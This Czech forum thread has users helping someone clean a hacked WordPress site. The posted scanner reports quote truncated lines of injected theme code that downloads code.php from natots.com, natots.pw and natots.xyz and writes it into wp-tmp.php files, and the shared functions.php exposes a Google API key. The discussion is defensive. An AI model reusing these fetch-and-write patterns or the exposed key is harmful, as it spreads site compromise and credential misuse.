WordPress – Antivirus ukazuje virus ve function.php, tam jsem, ale vše promazal.

Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni... Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak. Tohle je functions.php <?php /** * Understrap functions and definitions * * @package understrap */ function isa_add_img_title( $attr, $attachment = null ) { $img_title = trim( strip_tags( $attachment->post_title ) ); $attr = $img_title; $attr = $img_title; return $attr; } add_filter( 'wp_get_attachment_image_attributes','isa_add_img_title', 10, 2 ); /** * Initialize theme default settings */ require get_template_directory() . '/inc/theme-settings.php'; /** * Theme setup and custom theme supports. */ require get_template_directory() . '/inc/setup.php'; /** * Register widget area. */ require get_template_directory() . '/inc/widgets.php'; /** * Enqueue scripts and styles. */ require get_template_directory() . '/inc/enqueue.php'; /** * Custom template tags for this theme. */ require get_template_directory() . '/inc/template-tags.php'; /** * Custom pagination for this theme. */ require get_template_directory() . '/inc/pagination.php'; /** * Custom functions that act independently of the theme templates. */ require get_template_directory() . '/inc/extras.php'; /** * Customizer additions. */ require get_template_directory() . '/inc/customizer.php'; /** * Custom Comments file. */ require get_template_directory() . '/inc/custom-comments.php'; /** * Load Jetpack compatibility file. */ require get_template_directory() . '/inc/jetpack.php'; /** * Load custom WordPress nav walker. */ require get_template_directory() . '/inc/bootstrap-wp-navwalker.php'; /** * Load WooCommerce functions. */ require get_template_directory() . '/inc/woocommerce.php'; /** * Load Editor functions. */ require get_template_directory() . '/inc/editor.php'; function my_acf_init() { acf_update_setting('google_api_key', 'AIzaSyAwqSoFkZfM3C8CXKFAK-0s-QOxcM74oJA'); } add_action('acf/init', 'my_acf_init'); // remove dashicons in frontend to non-admin function wpdocs_dequeue_dashicon() { if (current_user_can( 'update_core' )) { return; } wp_deregister_style('dashicons'); } add_action( 'wp_enqueue_scripts', 'wpdocs_dequeue_dashicon' ); Zpráva pluginu antivir: /themes/understrap/functions.php This is not a virus if ($file = @file_get_contents(__FILE__)) This is not a virus @file_put_contents(__FILE__, $file); This is not a virus if ($file = @file_get_contents(__FILE__)) This is not a virus @file_put_contents(__FILE__, $file); This is not a virus $ch = curl_init(); This is not a virus $data = curl_exec($ch); This is not a virus $handle = fopen($tmpfname, "w+"); This is not a virus $handle = fopen($tmpfname, "w+"); This is not a virus fclose($handle); This is not a virus if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ... This is not a virus @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ... This is not a virus @file_put_contents(get_template_directory() . '/wp-tmp.php', ... This is not a virus @file_put_contents('wp-tmp.php', $tmpcontent); This is not a virus elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ... This is not a virus @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ... This is not a virus @file_put_contents(get_template_directory() . '/wp-tmp.php', ... This is not a virus @file_put_contents('wp-tmp.php', $tmpcontent); This is not a virus elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ... This is not a virus @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ... This is not a virus @file_put_contents(get_template_directory() . '/wp-tmp.php', ... This is not a virus @file_put_contents('wp-tmp.php', $tmpcontent); This is not a virus elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ... This is not a virus } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ... This is not a virus } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...

Zkus toto - https://wordpress.org/plugins/wordfence/ .. pomohl zatím všude, kde něco bylo. Občas tyhle věci hazí false positive. ---------- Post added 30.03.2019 at 11:43 ---------- btw ten kód není normální, z understrap/functions.php, smazat

Ten kod jsem nenašel, ale byl tam nějakej balast a ten jsem smazala udělal jsem scan na wordfence....File appears to be malicious: wp-content/themes/understrap/functions.phpType: FileIssue Found 30. 3. 2019 12:38CriticalRepairIgnore DetailsNeed help with a hacked website?Our team of security experts will clean the infection and remove malicious content. Once your site is restored we will provide a detailed report of our findings. Includes a 1-year Wordfence Premium license.File appears to be malicious: wp-content/plugins/search-filter-pro/admin/class-search-filter-admin.phpType: FileIssue Found 30. 3. 2019 12:38CriticalIgnore DetailsFile appears to be malicious: wp-includes/post.phpType: FileIssue Found 30. 3. 2019 12:38CriticalRepairIgnore DetailsFile appears to be malicious: wp-includes/wp-vcd.phpType: FileIssue Found 30. 3. 2019 12:38CriticalIgnore DetailsFile appears to be malicious: wp-includes/wp-tmp.phpType: FileIssue Found 30. 3. 2019 12:38CriticalIgnore DetailsWordPress core file modified: wp-includes/general-template.phpType: FileIssue Found 30. 3. 2019 12:33HighRepairIgnore DetailsWordPress core file modified: wp-includes/post.phpType: FileIssue Found 30. 3. 2019 12:33HighRepairIgnore DetailsUnknown file in WordPress core: wp-includes/wp-feed.phpType: FileIssue Found 30. 3. 2019 12:33HighIgnore DetailsUnknown file in WordPress core: wp-includes/wp-tmp.phpType: FileIssue Found 30. 3. 2019 12:33HighIgnore DetailsUnknown file in WordPress core: wp-includes/wp-vcd.phpType: FileIssue Found 30. 3. 2019 12:33Hig

To chce pročistit někým, kdo tomu rozumí.

Napsal PetrGargulák;1519658

Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...

Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.

Tohle je functions.php

<?php/** * Understrap functions and definitions * * @package understrap */ function isa_add_img_title( $attr, $attachment = null ) { $img_title = trim( strip_tags( $attachment->post_title ) ); $attr = $img_title; $attr = $img_title; return $attr;}add_filter( 'wp_get_attachment_image_attributes','isa_add_img_title', 10, 2 );/** * Initialize theme default settings */require get_template_directory() . '/inc/theme-settings.php';/** * Theme setup and custom theme supports. */require get_template_directory() . '/inc/setup.php';/** * Register widget area. */require get_template_directory() . '/inc/widgets.php';/** * Enqueue scripts and styles. */require get_template_directory() . '/inc/enqueue.php';/** * Custom template tags for this theme. */require get_template_directory() . '/inc/template-tags.php';/** * Custom pagination for this theme. */require get_template_directory() . '/inc/pagination.php';/** * Custom functions that act independently of the theme templates. */require get_template_directory() . '/inc/extras.php';/** * Customizer additions. */require get_template_directory() . '/inc/customizer.php';/** * Custom Comments file. */require get_template_directory() . '/inc/custom-comments.php';/** * Load Jetpack compatibility file. */require get_template_directory() . '/inc/jetpack.php';/** * Load custom WordPress nav walker. */require get_template_directory() . '/inc/bootstrap-wp-navwalker.php';/** * Load WooCommerce functions. */require get_template_directory() . '/inc/woocommerce.php';/** * Load Editor functions. */require get_template_directory() . '/inc/editor.php'; function my_acf_init() { acf_update_setting('google_api_key', 'AIzaSyAwqSoFkZfM3C8CXKFAK-0s-QOxcM74oJA');}add_action('acf/init', 'my_acf_init'); // remove dashicons in frontend to non-admin function wpdocs_dequeue_dashicon() { if (current_user_can( 'update_core' )) { return; } wp_deregister_style('dashicons'); } add_action( 'wp_enqueue_scripts', 'wpdocs_dequeue_dashicon' );

Zpráva pluginu antivir:

/themes/understrap/functions.php

This is not a virus

if ($file = @file_get_contents(__FILE__))

This is not a virus

@file_put_contents(__FILE__, $file);

This is not a virus

if ($file = @file_get_contents(__FILE__))

This is not a virus

@file_put_contents(__FILE__, $file);

This is not a virus

$ch = curl_init();

This is not a virus

$data = curl_exec($ch);

This is not a virus

$handle = fopen($tmpfname, "w+");

This is not a virus

$handle = fopen($tmpfname, "w+");

This is not a virus

fclose($handle);

This is not a virus

if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...

This is not a virus

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus

@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus

@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus

elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...

This is not a virus

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus

@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus

@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus

elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...

This is not a virus

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus

@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus

@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus

elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...

This is not a virus

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...

This is not a virus

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...

To není chyba pouze ve functions.

A proč si neuděláš zálohu DB a nenahraješ čistou instalaci WP? Nebude to rychlejší?

neni to jen o pluginu ale hlavne o znalostech

Tak kdo chce , ať sem hodí cenu za kterou to dá nebo mě do zpráv jak kdo chce, poptávám zrychlení a odvirování wordpresu.

Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?

Napsal Wladass;1519693

Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?

To bys musel vědět na jistotu, že db je čistá---------- Post added 30.03.2019 at 18:45 ----------Nemluvě o faktu, že wp-content nemůžeš jen tak smazat.

Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

Napsal Wladass;1519697

Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.

Napsal Wladass;1519697

Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.

Napsal Tomve;1519700

Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.

Zajímavé, to jsem nevěděl. Dík za poznatek.

Napsal Depotys;1519701

To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.

Útočník si vytvořil uživatele s admin právy? :)